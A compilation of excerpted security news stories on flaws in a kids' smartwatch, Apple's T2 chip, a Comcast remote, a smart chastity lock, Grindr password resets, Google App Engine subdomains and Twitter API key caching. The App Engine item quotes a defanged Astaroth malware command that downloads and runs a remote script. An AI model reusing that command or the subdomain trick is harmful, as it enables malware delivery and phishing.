Exploiting this backdoor requires knowing the phone number of the target device and its factory-set encryption key. This data is available to those to Qihoo and Xplora, according to the researchers, and can be pulled off the device physically using specialist tools. This basically means ordinary folks aren’t going to be hacked, either by the manufacturer under orders from Beijing or opportunistic miscreants attacking gizmos in the wild, though it is an issue for persons of interest. It also highlights the kind of code left lingering in mass-market devices.

Source: Backdoorer the Xplora: Kids’ smart-watches can secretly take pics, record audio on command by encrypted texts • The Register

Apple’s T2 custom secure boot chip is not only insecure, it cannot be fixed without replacing the silicon

Apple’s T2 security chip is insecure and cannot be fixed, a group of security researchers report.

Over the past three years, a handful of hackers have delved into the inner workings of the custom silicon, fitted inside recent Macs, and found that they can use an exploit developed for iPhone jailbreaking, checkm8, in conjunction with a memory controller vulnerability known as blackbird, to compromise the T2 on macOS computers.

The primary researchers involved – @h0m3us3r, @mcmrarm, @aunali1 and Rick Mark (@su_rickmark) – expanded on the work @axi0mX did to create checkm8 and adapted it to target the T2, in conjunction with a group that built checkm8 into their checkra1n jailbreaking software. Mark on Wednesday published a timeline of relevant milestones.

The T2, which contains a so-called secure enclave processor (SEP) intended to safeguard Touch ID data, encrypted storage, and secure boot capabilities, was announced in 2017. Based on the Arm-compatible A10 processor used in the iPhone 7, the T2 first appeared in devices released in 2018, including MacBook Pro, MacBook Air, and Mac mini. It has also shown up in the iMac Pro and was added to the Mac Pro in 2019, and the iMac in 2020.

The checkm8 exploit, which targets a use-after-free() vulnerability, allows an attacker to run unsigned code during recovery mode, or Device Firmware Update (DFU) mode. It has been modified to enable a tethered debug interface that can be used to subvert the T2 chip.

So with physical access to your T2-equipped macOS computer, and an appropriate USB-C cable and checkra1n 0.11, you – or a miscreant in your position – can obtain root access and kernel execution privileges on a T2-defended Mac. This allows you to alter macOS, loading arbitrary kernel extensions, and expose sensitive data.

According to Belgian security biz ironPeak, it also means that firmware passwords and remote device locking capabilities, instituted via MDM or the FindMy app, can be undone.

Compromising the T2 doesn’t dissolve macOS FileVault2 disk encryption but it would allow someone to install a keylogger to obtain the encryption key or to attempt to crack the key using a brute-force attack.

[…]

Unfortunately, it appears the T2 cannot be fixed. “Apple uses SecureROM in the early stages of boot,” explained Rick Mark in a blog post on Monday. “ROM cannot be altered after fabrication and is done so to prevent modifications. This usually prevents an attacker from placing malware at the beginning of the boot chain, but in this case also prevents Apple from fixing the SecureROM.”

Source: Apple’s T2 custom secure boot chip is not only insecure, it cannot be fixed without replacing the silicon • The Register

Listening in on your XR11 remote from 20m away

Guardicore discovered a new attack vector on Comcast’s XR11 voice remote that would have allowed attackers to turn it into a listening device – potentially invading your privacy in your living room. Prior to its remediation by Comcast, the attack, dubbed WarezTheRemote, was a very real security threat: with more than 18 million units deployed across homes in the USA, the XR11 is one of the most widespread remote controls in existence.

WarezTheRemote used a man-in-the-middle attack to exploit remote’s RF communication with the set-top box and over-the-air firmware upgrades – by pushing a malicious firmware image back the remote, attackers could have used the remote to continuously record audio without user interaction.

The attack did not require physical contact with the targeted remote or any interaction from the victim – any hacker with a cheap RF transceiver could have used it to take over an XR11 remote. Using a 16dBi antenna, we were able to listen to conversations happening in a house from about 65 feet away. We believe this could have been amplified easily using better equipment.

We worked with Comcast’s security team after finding the vulnerability and they have released fixes that remediate the issues that made the attack possible.

You can download our full research paper for the technical details of the WarezTheRemote project. You’ll find much more information on the reverse-engineering process inside, as well as a more bits-and-bytes perspective on the vulnerability and the exploit.

Source: A New Attack Vector Discovered in Comcast’s Remote | Guardicore

Smart male chastity hack could lock all dicks up permanently, require grinder to unlock. Also tells anyone where you are

  • Smart Bluetooth male chastity lock, designed for user to give remote control to a trusted 3rd party using mobile app/API
  • Multiple API flaws meant anyone could remotely lock all devices and prevent users from releasing themselves
  • Removal then requires an angle grinder or similar, used in close proximity to delicate and sensitive areas
  • Precise user location data also leaked by API, including personal information and private chats
  • Vendor initially responsive, then missed three remediation deadlines they set themselves over a 6 month period
  • Then finally refused to interact any further, even though majority of issues were resolved in migration to v2 API, yet API v1 inexcusably left available
  • This post is published in coordination with Internet of Dongs.

Smart adult toys and us

We haven’t written about smart adult toys in a long time, but the Qiui Cellmate chastity cage was simply too interesting to pass by. We were tipped off about the adult chastity device, designed to lock-up the wearer’s appendage.

There are other male chastity devices available but this is a Bluetooth (BLE) enabled lock and clamp type mechanism with a companion mobile app. The idea is that the wearer can give control of the lock to someone else.

We are not in the business of kink shaming. People should be able to use these devices safely and securely without the risk of sensitive personal data being leaked.

The security of the teledildonics field is interesting in its own right. It’s worth noting that sales of smart adult toys has risen significantly during the recent lockdown.

What is the risk to users?

We discovered that remote attackers could prevent the Bluetooth lock from being opened, permanently locking the user in the device. There is no physical unlock. The tube is locked onto a ring worn around the base of the genitals, making things inaccessible. An angle grinder or other suitable heavy tool would be required to cut the wearer free.

Location, plaintext password and other personal data was also leaked, without need for authentication, by the API.

We had particular problems during the disclosure process, as we would usually ask the vendor to take down a leaky API whilst remediation was being implemented. However, anyone currently using the device when the API was taken offline would also be permanently locked in!

As you will see in the disclosure timeline at the bottom of this post, some issues were remediated but others were not, and the vendor simply stopped replying to us, journalists, and retailers. Given the trivial nature of finding some of these issues, and that the company is working on another device that poses even greater potential physical harm (an “internal” chastity device), we have felt compelled to publish these findings at this point.

Source: Smart male chastity lock cock-up | Pen Test Partners

Grindr security flaw let anyone take over any accounts easily

Grindr, one of the world’s largest dating and social networking apps for gay, bi, trans, and queer people, has fixed a security vulnerability that allowed anyone to hijack and take control of any user’s account using only their email address.

Wassime Bouimadaghene, a French security researcher, found the vulnerability and reported the issue to Grindr. When he didn’t hear back, Bouimadaghene shared details of the vulnerability with security expert Troy Hunt to help.

The vulnerability was fixed a short time later.

Hunt tested and confirmed the vulnerability with help from a test account set up by Scott Helme, and shared his findings with TechCrunch.

Bouimadaghene found the vulnerability in how the app handles account password resets.

To reset a password, Grindr sends the user an email with a clickable link containing an account password reset token. Once clicked, the user can change their password and is allowed back into their account.

But Bouimadaghene found that Grindr’s password reset page was leaking password reset tokens to the browser. That meant anyone could trigger the password reset who had knowledge of a user’s registered email address, and collect the password reset token from the browser if they knew where to look.

Secret tokens used to reset Grindr account passwords, which are only supposed to be sent to a user’s inbox, were leaking to the browser. (Image: Troy Hunt/supplied)

The clickable link that Grindr generates for a password reset is formatted the same way, meaning a malicious user could easily craft their own clickable password reset link — the same link that was sent to the user’s inbox — using the leaked password reset token from the browser.

With that crafted link, the malicious user can reset the account owner’s password and gain access to their account and the personal data stored within, including account photos, messages, sexual orientation and HIV status and last test date.

“This is one of the most basic account takeover techniques I’ve seen,” Hunt wrote.

Google App Engine feature abused to create unlimited phishing pages

A newly discovered technique by a researcher shows how Google’s App Engine domains can be abused to deliver phishing and malware while remaining undetected by leading enterprise security products.

Google App Engine is a cloud-based service platform for developing and hosting web apps on Google’s servers.

While reports of phishing campaigns leveraging enterprise cloud domains are nothing new, what makes Google App Engine infrastructure risky in how the subdomains get generated and paths are routed.

Practically unlimited subdomains for one app

Typically scammers use cloud services to create a malicious app that gets assigned a subdomain. They then host phishing pages there. Or they may use the app as a command-and-control (C2) server to deliver malware payload.

But the URL structures are usually generated in a manner that makes them easy to monitor and block using enterprise security products, should there be a need.

For example, a malicious app hosted on Microsoft Azure services may have a URL structure like: https://example-subdomain.app123.web.core.windows.net/…

Therefore, a cybersecurity professional could block traffic to and from this particular app by simply blocking requests to and from this subdomain. This wouldn’t prevent communication with the rest of the Microsoft Azure apps that use other subdomains.

It gets a bit more complicated, however, in the case of Google App Engine.

Security researcher Marcel Afrahim demonstrated an intended design of Google App Engine’s subdomain generator, which can be abused to use the app infrastructure for malicious purposes, all while remaining undetected.

Google’s appspot.com domain, which hosts apps, has the following URL structure:

VERSION-dot-SERVICE-dot-PROJECT_ID.REGION_ID.r.appspot.com

A subdomain, in this case, does not only represent an app, it represents an app’s version, the service name, project ID, and region ID fields.

But the most important point to note here is, if any of those fields are incorrect, Google App Engine won’t show a 404 Not Found page, but instead show the app’s “default” page (a concept referred to as soft routing).

“Requests are received by any version that is configured for traffic in the targeted service. If the service that you are targeting does not exist, the request gets Soft Routed,” states Afrahim, adding:

“If a request matches the PROJECT_ID.REGION_ID.r.appspot.com portion of the hostname, but includes a service, version, or instance name that does not exist, then the request is routed to the default service, which is essentially your default hostname of the app.”

Essentially, this means there are a lot of permutations of subdomains to get to the attacker’s malicious app. As long as every subdomain has a valid “project_ID” field, invalid variations of other fields can be used at the attacker’s discretion to generate a long list of subdomains, which all lead to the same app.

For example, as shown by Afrahim, both URLs below – which look drastically different, represent the same app hosted on Google App Engine.

https://random123-random123-random123-dot-bad-app-2020.ue.r.appspot.com
https://insertanythingyouwanthere-xyz123-xyz123-dot-bad-app-2020.ue.r.appspot.com

“Verified by Google Trust Services” means trusted by everyone

The fact that a single malicious app is now represented by multiple permutations of its subdomains makes it hard for sysadmins and security professionals to block malicious activity.

But further, to a technologically unsavvy user, all of these subdomains would appear to be a “secure site.” After all, the appspot.com domain and all its subdomains come with the seal of “Google Trust Services” in their SSL certificates.

google app engine phishing
Google App Engine sites showing valid SSL certificate with “Verified by: Google Trust Services” text
Source: Afrahim

Even further, most enterprise security solutions such as Symantec WebPulse web filter automatically allow traffic to trusted category sites. And Google’s appspot.com domain, due to its reputation and legitimate corporate use cases, earns an “Office/Business Applications” tag, skipping the scrutiny of web proxies.

Bypassing enterprise security solutions
Automatically trusted by most enterprise security solutions

On top, a large number of subdomain variations renders the blocking approach based on Indicators of Compromise (IOCs) useless.

A screenshot of a test app created by Afrahim along with a detailed “how-to” demonstrates this behavior in action.

In the past, Cloudflare domain generation had a similar design flaw that Astaroth malware would exploit via the following command wheen fetching stage 2 payload:

%ComSpec% /c “echo GetObject(“script:hxxps://xsw%RANDOM%nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev/?09/”)” > %temp%\Lqncxmm:vbvvjjh.js && start wscript.exe %temp%\Lqncxmm:vbvvjjh.js”

This would essentially launch a Windows command prompt and put a random number replacing %RANDOM% making the payload URL truly dynamic.

“And now you have a script that downloads the payload from different URL hostnames each time is run and would render the network IOC of such hypothetical sample absolutely useless. The solutions that rely on single run on a sandbox to obtain automated IOC would therefore get a new Network IOC and potentially new file IOC if script is modified just a bit,” said the researcher.

Google App Engine subdomain variations
Delivering malware via Google App Engine subdomain variations while bypassing IOC blocks

Actively exploited for phishing attacks

Security engineer and pentester Yusuke Osumi tweeted last week how a Microsoft phishing page hosted on the appspot.com subdomain was exploiting the design flaw Afrahim has detailed.

Osumi additionally compiled a list of over 2,000 subdomains generated dynamically by the phishing app—all of them leading to the same phishing page.

active exploitation google app engine phishing
Active exploitation of Google App Engine subdomains in phishing attacks
Source: Twitter

This recent example has shifted the focus of discussion from how Google App Engine’s flaw can be potentially exploited to active phishing campaigns leveraging the design flaw in the wild.

“Use a Google Drive/Service phishing kit on Google’s App Engine and normal user would not just realize it is not Google which is asking for credentials,” concluded Afrahim in his blog post.

Source: Google App Engine feature abused to create unlimited phishing pages

Twitter warns of possible API keys leak through browser caching

Twitter is notifying developers today about a possible security incident that may have impacted their accounts.

The incident was caused by incorrect instructions that the developer.twitter.com website sent to users’ browsers.

The developer.twitter.com website is the portal where developers manage their Twitter apps and attached API keys, but also the access token and secret key for their Twitter account.

In an email sent to developers today, Twitter said that its developer.twitter.com website told browsers to create and store copies of the API keys, account access token, and account secret inside their cache, a section of the browser where data is saved to speed up the process of loading the page when the user accessed the same site again.

This might not be a problem for developers using their own browsers, but Twitter is warning developers who may have used public or shared computers to access the developer.twitter.com website — in which case, their API keys are now most likely stored in those browsers.

“If someone who used the same computer after you in that temporary timeframe knew how to access a browser’s cache, and knew what to look for, it is possible they could have accessed the keys and tokens that you viewed,” Twitter said.

“Depending on what pages you visited and what information you looked at, this could have included your app’s consumer API keys, as well as the user access token and secret for your own Twitter account,” Twitter said.

Source: Twitter warns of possible API keys leak | ZDNet